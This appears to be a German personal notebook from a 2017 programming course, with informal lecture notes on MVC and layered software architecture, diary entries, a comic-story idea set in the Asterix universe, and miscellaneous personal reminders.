MODEL: Das Modell verwaltet die darzustellenden Daten und kombiniert sie mit der Anwendungslogik. -Verwaltet Daten -Kombiniert mit Anwenderlogik

VIEW: Der View ist für die Darstellung der vom Modell neu erzeugten Daten zuständig. Er kann Informationen aus dem Modell abrufen und darstellen, wird über Änderungen des Modells informiert und nimmt Nutzereingaben entgegen.

CONTROLLER: Das Model view Controller ist ein Paradigma Paradigma: Weltsicht (z.b. früher Erde war Scheibe) - View und Controller arbeiten zusammen - Model unabhängig operiert - Programmcode wiederverwertbar - Programmcode leichter zu warten

.. und mehr .. pattern, linearität, komponenten - teile und herrsche architekten, wo soll ein haus stehen? Software-architektur: apache mqtt, arduino usw.. zerlegt gesamtsystem, kopplung flach halten, nur teil austauschen, kann jeder teil entwickeln, unabhängig testen, codesmell wird verhindert thin-client rich-client bevor software existiert, kann auf architektur überprüft werden ihk will eher architekten haben, die unterschied zwischen software und wirtschaft kennen statt hardcore-coder architekt: liebt verteilungsdiagramm, sollen zugrundeliegen. was er macht: Problemstellungen besser lösen und absichern entwurf: keinesfalls detailliert architekten(reden mit bossen) von entwickler(maurer) getrennt

Arten von Schichtarchitektur: nicht-strikt vorteil: performanter nachteil: verkoppelt strikt: bidirektional: immer eine richtung, nur den nächsten layer unidirektional: kann springen verboten: weg nach oben zweischichten-architaktur: dbms: sql. oracle unter assoziation zwischen client und server: 0.* 1 0 bis viele clients können auf server zugreifen dreischichten: nur die höheren schichten dürfen auf die niedrigen zugreifen, unterschied zur mvc. auswendig zur prüfung kennen. niedrigste schichten: datenbank, pakete datenhaltungsschicht: backend genannt auch .. json, netzwerk .. nebenthema wirtschinformatik: leerzeilen wegexen: metrik softwarequalitätsmetrik .. vergleich .. zu viel code .. nix verstehen .. warum metrik? Metrikzahl .. zahl von einem algoritmus abgeleitet wird google: algorithmus bertrand meyer war modul-erfinder in software, explizite schnittstelle teile und herrsche: ich teile in module, ein problem in kleinere teile zerlegen mvc: ruby on rails = reines mvc. hauptteile sind separat voneinander unabhängig

MODEL: nutzereingaben als daten interpretiert werden können, datenhaltung niemals referenz auf andere teile VIEW: gui CONTROLLER: observer, zwischen view und model. dauerschleifending emulieren gekoppelt und nicht-gekoppelt das model ist ganz frei, gehört niemanden; triangular .. controller kennt model und view. Observer vom controller guckt: haben sich Daten verändert? Informiert die view: daten haben sich verändert. lose kopplung zukünfige programme: lediglich präsi & steuer-elemente anpassen verahren, neuladen.

controller: beide (model, view)kennt über ihn werden daten transporiert; spielwirtschaft ganz andere ideen über ihn. view darf nicht daten greifen, controller benutzeraktion mcv: keine architektur: objekte übernehmen programmlogik wo spiellogik, wir müssen sie mit den eigenen waffen schlagen, the twelve tasks of asterix.. wie man das Arbeitsamt mit eigenen waffen schlägt mvc hat alles in Modulen, so dass mit einem kaputten Teil im Code nicht das ganze Programm kaputt ist.

8.2.2017 MVC in die Praxis umgesetzt: Mit Java und Antje

Viel Java abgetippt, antje hatte dazu was erklärt.

Mein Debian stürzt dauernd ab, Julian verwendet Mate. Vielleicht sollte ich die Grafikoderfläche wechseln ..

Ich musste heute ab 13h gehen, wegen Termin.

Von Fr. Housein Arztbesuchsbestätigung nach reichen lassen !!

Seitenzahlen später beginnen lassen: https://www.google.de/?gws_rd=ssl#q=microsoft+word+seitenzahlen+sp %C3%A4ter+beginnen&*

9.2.2017

10.2.2017 -- Ich sollte Kunst für konkrete Personen gestalten.

Folgende Idee, das Menschlein, dass durch die Subkulturen führen soll, könnte in der Rahmenhandlung aus dem Asterix-Universum entnommen werden. Zu beginn: Wir schreiben das Jahr 8 nach christalpha minus us. Ganz Germanien steht unter römischer Verwaltung. Ganz Germanien? Nein, die Stadt Berlinicum, im äußersten Nordosten des Stammesgebiets wagt es, dem römischen Eindringling Widerstand zu leisten.

Die erklärende Person ist ein Augure, oder eine Augurin, ein Seher vom römischen Hügel Palatin, der/die in die Zukunft gucken kann und die Geschichte/das Kapitel erklärt.

Jedes Kapitel eine Randgruppe. Dann werden Anti-Germanen, die, wie sie anmerkt, in Zukunft Anti-Deutsche genannt. Diese sogenannten Antideutsche werden Teil des Widerstands gegen die Nachfolge des römischen Reichs, der EU, sein. Irgendwie so in der Art werden die Geschichten gestaltet.

Sie hat den Chronovisor zur visuellen zur Hilfenahme und kann mittels Tracking z.b. im Bild der Zukunft umher wandeln.

Bis zu den Weihnachtsferien soll “Shennongs Tea” alpha minus der letzte Comic sein . .verdammt, dass Son-Goku Shennongs Tee rettet, will sich jetzt so “reinquetschen”. Aber, ich will programmieren lernen!

– Da sind teils Kutschen auf der Autobahn normal, oft unbeleuchtet bei Nacht. Bekiffte LKW Fahrer ebenso und Leute mit Fernlicht (hat da nicht jeder) blenden gerne auf um anderen zu imponieren. Im Iran waren die damaligen Sicherheitskontrollen besonders streng und so mancher Hippie musste seinen Vorrat an alternativen Substanzen noch aus dem fahrenden Bus werfen, um den harten Strafen der iranischen Behörden zu entgehen. man kann mit git neue software aufspielen .. .wa?

// Silvia wäre jetzt 64 Jahre alt und würde am 25.3.2017 65 Jahre alt werden.

Delicado bocado

Die EU wurde 1992 über den Vertrag zu Maastricht gegründet.